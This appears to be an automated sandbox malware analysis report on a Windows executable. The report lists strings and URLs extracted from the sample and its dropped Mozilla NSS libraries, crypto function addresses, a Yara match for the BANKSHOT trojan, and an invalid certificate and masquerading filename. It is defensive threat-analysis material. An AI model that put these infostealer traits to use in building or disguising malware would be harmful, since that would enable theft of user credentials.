Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/help/
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/openU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.comopenS
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.comopenU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 9JtNIXVedn.exe	String found in binary or memory: http://www.indyproject.org/
Source: 9JtNIXVedn.exe, 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 9JtNIXVedn.exe, 00000000.00000002.1689407695.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 9JtNIXVedn.exe	String found in binary or memory: https://api.coingecko.com/api/v3/coins/
Source: 9JtNIXVedn.exe	String found in binary or memory: https://api.coingecko.com/api/v3/coins/list
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: 9JtNIXVedn.exe	String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: 9JtNIXVedn.exe	String found in binary or memory: https://vovsoft.com/translation/
Source: 9JtNIXVedn.exe	String found in binary or memory: https://vovsoft.com/translation/openU
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: 9JtNIXVedn.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.9JtNIXVedn.exe.3144ff7.0.raw.unpack, type: UNPACKEDPE

Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

Detected potential crypto function

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBECD0	0_2_6CDBECD0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD5ECC0	0_2_6CD5ECC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD6AC60	0_2_6CD6AC60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3AC30	0_2_6CE3AC30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE26C00	0_2_6CE26C00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEECDC0	0_2_6CEECDC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF6D90	0_2_6CDF6D90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD64DB0	0_2_6CD64DB0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2ED70	0_2_6CE2ED70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE8AD50	0_2_6CE8AD50
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE8D20	0_2_6CEE8D20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD6AEC0	0_2_6CD6AEC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE00EC0	0_2_6CE00EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE6E90	0_2_6CDE6E90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFEE70	0_2_6CDFEE70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE40E20	0_2_6CE40E20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3EFF0	0_2_6CE3EFF0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD60FE0	0_2_6CD60FE0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA8FB0	0_2_6CEA8FB0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD6EFB0	0_2_6CD6EFB0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE22F70	0_2_6CE22F70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDCEF40	0_2_6CDCEF40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD66F10	0_2_6CD66F10
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0F20	0_2_6CEA0F20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE668E0	0_2_6CE668E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE34840	0_2_6CE34840
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB0820	0_2_6CDB0820
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDEA820	0_2_6CDEA820
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE7C9E0	0_2_6CE7C9E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD949F0	0_2_6CD949F0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE1A9A0	0_2_6CE1A9A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE209B0	0_2_6CE209B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF09A0	0_2_6CDF09A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD98960	0_2_6CD98960
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB6900	0_2_6CDB6900
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDDEA80	0_2_6CDDEA80
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDDCA70	0_2_6CDDCA70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE18A30	0_2_6CE18A30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE0EA00	0_2_6CE0EA00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE66BE0	0_2_6CE66BE0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE00BA0	0_2_6CE00BA0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD68BAC	0_2_6CD68BAC
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDA64D0	0_2_6CDA64D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFA4D0	0_2_6CDFA4D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE8A480	0_2_6CE8A480
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD78460	0_2_6CD78460
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDEA430	0_2_6CDEA430
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC4420	0_2_6CDC4420
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2A5E0	0_2_6CE2A5E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDEE5F0	0_2_6CDEE5F0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD545B0	0_2_6CD545B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE00570	0_2_6CE00570
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB8540	0_2_6CDB8540
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE64540	0_2_6CE64540
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA8550	0_2_6CEA8550
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC2560	0_2_6CDC2560
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD846D0	0_2_6CD846D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBE6E0	0_2_6CDBE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFE6E0	0_2_6CDFE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBC650	0_2_6CDBC650
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD8A7D0	0_2_6CD8A7D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE0700	0_2_6CDE0700
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD58090	0_2_6CD58090
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3C0B0	0_2_6CE3C0B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD700B0	0_2_6CD700B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDAE070	0_2_6CDAE070
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2C000	0_2_6CE2C000
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE28010	0_2_6CE28010
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD601E0	0_2_6CD601E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEB61B0	0_2_6CEB61B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC8140	0_2_6CDC8140
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE44130	0_2_6CE44130
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDD6130	0_2_6CDD6130
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE62C0	0_2_6CEE62C0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE322A0	0_2_6CE322A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2E2B0	0_2_6CE2E2B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF8250	0_2_6CDF8250
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE8260	0_2_6CDE8260
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE38220	0_2_6CE38220
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2A210	0_2_6CE2A210
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB43E0	0_2_6CDB43E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBE3B0	0_2_6CDBE3B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD923A0	0_2_6CD923A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE7C360	0_2_6CE7C360
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD68340	0_2_6CD68340
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA2370	0_2_6CEA2370
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD62370	0_2_6CD62370
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF6370	0_2_6CDF6370
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDD2320	0_2_6CDD2320
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE21CE0	0_2_6CE21CE0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE9DCD0	0_2_6CE9DCD0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFFC80	0_2_6CDFFC80
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD63C40	0_2_6CD63C40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE89C40	0_2_6CE89C40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD71C30	0_2_6CD71C30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE31DC0	0_2_6CE31DC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD53D80	0_2_6CD53D80
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA9D90	0_2_6CEA9D90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC3D00	0_2_6CDC3D00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD83EC0	0_2_6CD83EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE5E60	0_2_6CEE5E60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEBBE70	0_2_6CEBBE70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE6DE10	0_2_6CE6DE10
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE0BFF0	0_2_6CE0BFF0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE7DFC0	0_2_6CE7DFC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE3FC0	0_2_6CEE3FC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD81F90	0_2_6CD81F90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEB7F20	0_2_6CEB7F20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD55F30	0_2_6CD55F30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD95F20	0_2_6CD95F20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3F8F0	0_2_6CE3F8F0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEBB8F0	0_2_6CEBB8F0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CEEDAE0 appears 59 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CEED930 appears 48 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CE99F30 appears 31 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CD89B10 appears 73 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CEE09D0 appears 267 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CD83620 appears 74 times

PE / OLE file has an invalid certificate

Source: 9JtNIXVedn.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: 9JtNIXVedn.exe

Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: 9JtNIXVedn.exe, 00000000.00000000.1373704928.0000000000B76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecryptotracker.exeP vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000000.1372749288.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000000.1372749288.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: \OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1690872692.000000006CF35000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1657076285.0000000002BF8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1691379887.000000006FF32000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe	Binary or memory string: OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe	Binary or memory string: \OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe	Binary or memory string: OriginalFilenamecryptotracker.exeP vs 9JtNIXVedn.exe

Uses 32bit PE files

Source: 9JtNIXVedn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 0.2.9JtNIXVedn.exe.3144ff7.0.raw.unpack, type: UNPACKEDPE

Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDC0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CDC0300

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\2REHJVOY.htm

Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
